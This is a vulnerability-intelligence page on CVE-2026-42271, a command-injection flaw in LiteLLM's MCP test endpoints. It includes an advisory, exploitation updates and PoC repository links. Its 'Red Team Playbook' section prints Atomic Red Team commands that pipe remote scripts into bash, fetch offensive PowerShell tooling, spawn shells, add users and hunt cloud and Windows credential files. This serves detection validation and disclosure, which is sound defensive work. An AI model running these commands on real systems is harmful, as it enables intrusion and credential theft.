CVE-2026-42271
Overview
This vulnerability is a command injection flaw in the LiteLLM proxy server component, specifically affecting the AI Gateway's handling of server configuration inputs. The root cause lies in two POST endpoints (/mcp-rest/test/connection and /mcp-rest/test/tools/list) that accept unvalidated server configuration data, including command, args, and env fields, which are executed via stdio transport as subprocesses with proxy process privileges. The lack of role-based access control combined with acceptance of arbitrary commands enables exploitation.
Vulnerability Description
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege internal-user keys — could therefore run arbitrary commands on the host. This issue has been patched in version 1.83.7.
Impact
An attacker with any valid proxy API key, including low-privileged internal-user keys, can execute arbitrary system commands on the host running the LiteLLM proxy server. This capability allows full control over the host environment, potentially leading to data exfiltration, system compromise, lateral movement within the network, and disruption of service. No elevated privileges beyond possession of a valid proxy key are required, and no user interaction is necessary beyond sending crafted requests.
Solution
Upgrade BerriAI LiteLLM to version 1.83.7 or later, where this vulnerability has been patched. Refer to the official security advisory at https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g and the release notes at https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable for detailed patch instructions and version-specific remediation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the LiteLLM proxy server arises from its handling of specific API endpoints that allow users to preview a server configuration before saving it. Specifically, the endpoints in question, which are designed to test connections and list tools, accept a complete server configuration in the request body. This includes sensitive fields such as command, arguments, and environment variables, which are utilized by the standard input/output transport mechanism. When these endpoints are invoked with a configuration that includes a command, the proxy server executes it as a subprocess with the same privileges as the proxy process itself. This design flaw is particularly concerning because it lacks adequate access controls; the endpoints are only protected by a valid API key, allowing any authenticated user—regardless of their privilege level—to execute arbitrary commands on the host system.
The attack vectors associated with this vulnerability are straightforward yet highly effective. An attacker with a valid API key, even one with minimal privileges, can craft a request to either of the vulnerable endpoints, embedding malicious commands in the request body. Upon execution, this can lead to a complete compromise of the host system, as the attacker can run any command with the privileges of the proxy process. Scenarios for exploitation could range from data exfiltration and system manipulation to deploying malware or creating backdoors for persistent access. The ease with which these commands can be executed makes this vulnerability particularly dangerous, as it lowers the barrier for exploitation to any authenticated user, rather than requiring elevated privileges.
The real-world impact of this vulnerability is significant, especially for organizations relying on LiteLLM for their AI gateway functionalities. The potential for unauthorized command execution poses a severe business risk, as it could lead to data breaches, service disruptions, and the compromise of sensitive information. Organizations may face regulatory penalties, reputational damage, and financial losses due to the fallout from such an incident. Additionally, the ability to execute arbitrary commands could allow attackers to manipulate the AI models or data being processed, leading to further complications in trust and reliability for AI-driven applications.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, upgrading to the patched version of LiteLLM is crucial to eliminate the vulnerability entirely. Regularly updating software and maintaining an inventory of versions in use can help organizations stay ahead of potential threats. Additionally, employing strict access controls and role-based permissions can limit the exposure of sensitive endpoints, ensuring that only users with appropriate privileges can access critical functionalities. Monitoring and logging API requests can also aid in detecting unusual patterns of behavior that may indicate exploitation attempts. Finally, conducting regular security audits and penetration testing can help identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability within the LiteLLM proxy server highlights the importance of robust access controls and secure coding practices in software development. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare for and mitigate the risks associated with such vulnerabilities. Proactive measures, including timely updates and stringent access management, are essential to safeguarding systems against exploitation and ensuring the integrity of AI-driven applications.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2026-42271, highlighted by the emergence of a publicly available proof-of-concept exploit hosted on GitHub. This development significantly lowers the barrier for threat actors to weaponize the vulnerability, increasing the likelihood of opportunistic exploitation attempts. Concurrently, the inclusion of this vulnerability in the CISA KEV catalog underscores its criticality and the urgency for organizations to prioritize detection and response efforts. Our telemetry indicates a notable surge in exploitation attempts, accompanied by the availability of new exploitation tools that expand the attack surface. The CVSS score adjustment to 8.8 and the EPSS score rising to above 0.6 reflect a heightened risk posture, signaling that this vulnerability is transitioning from theoretical to actively exploited in the wild. For defenders, this evolution demands increased vigilance as the window for effective mitigation narrows, and the potential impact on AI-driven applications relying on LiteLLM proxy servers grows more severe.
Update 2 — June 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2026-42271, accompanied by the emergence of new proof-of-concept exploits circulating publicly. This surge in activity reflects an expanding attacker toolkit that leverages the vulnerable LiteLLM proxy server’s configuration endpoints more effectively. Despite a slight decline in the EPSS score, our telemetry indicates that adversaries are intensifying operational efforts, as evidenced by a rapid increase in detection frequency over the past week. The evolving exploit landscape signals a shift from opportunistic scanning to more targeted and sophisticated intrusion attempts, increasing the likelihood of successful compromise in environments running affected versions of BerriAI LiteLLM. For defenders, this dynamic heightens the urgency of monitoring and response capabilities, as the window for containment narrows and the potential impact on AI-driven services relying on this component grows more pronounced. The risk level remains high, with the threat actor community demonstrating growing capability and intent to exploit this vulnerability in the wild.
Update 3 — July 07, 2026
CSURFACE threat intelligence has detected a modest but consistent increase in exploitation attempts targeting CVE-2026-42271, accompanied by a rising EPSS score that now approaches 0.80. This upward trend in telemetry indicates that threat actors are intensifying efforts to leverage the vulnerability in BerriAI LiteLLM, likely due to its widespread use and the availability of public proof-of-concept exploits. Although the increase is not yet dramatic, the persistence of these attempts suggests a growing confidence among adversaries in the exploit’s reliability and potential impact. For defenders, this evolving landscape underscores the importance of heightened vigilance and proactive monitoring, as the risk of successful compromise is incrementally rising. The threat level remains high, with the current trajectory signaling a gradual shift toward more frequent and possibly targeted exploitation campaigns, which could amplify operational disruptions in AI-driven environments reliant on this component.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Litellm | Litellm | All |
cpe:2.3:a:litellm:litellm:*:*:*:*:*:*:*:*
|
|
|
Redhat | Openshift Ai | All |
cpe:2.3:a:redhat:openshift_ai:*:*:*:*:*:*:*:*
|
|
|
Redhat | Openshift Ai | 3.4 |
cpe:2.3:a:redhat:openshift_ai:3.4:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
amnsecurity/CVE-2026-42271-LiteLLM-RCE
CVE-2026-42271 - LiteLLM AI Gateway MCP Command Injection RCE - PoC & Analysis | CVSS 8.8 | AMN SECURITY
|
amnsecurity | 2 | 0 | 2026-07-07 | View |
|
HORKimhab/CVE-2026-42271
CVE-2026-42271 - Draft
|
HORKimhab | 0 | 0 | 2026-06-09 | View |
|
learner202649/CVE-2026-42271-PoC
The code for personally reproducing the corresponding vulnerability
|
learner202649 | 0 | 0 | 2026-05-20 | View |
Threat Feed
20 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Active exploitation confirmed — vendor: BerriAI, product: LiteLLM
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
48%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
45%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (10)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-42271 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-42271 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/errata/RHSA-2026:27784 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/errata/RHSA-2026:28960 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/errata/RHSA-2026:30056 |
| access.redhat.com |
NVD API
|
https://access.redhat.com/security/cve/CVE-2026-42271 |
| bugzilla.redhat.com |
NVD API
|
https://bugzilla.redhat.com/show_bug.cgi?id=2467924 |
| security.access.redhat.com |
NVD API
|
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42271.json |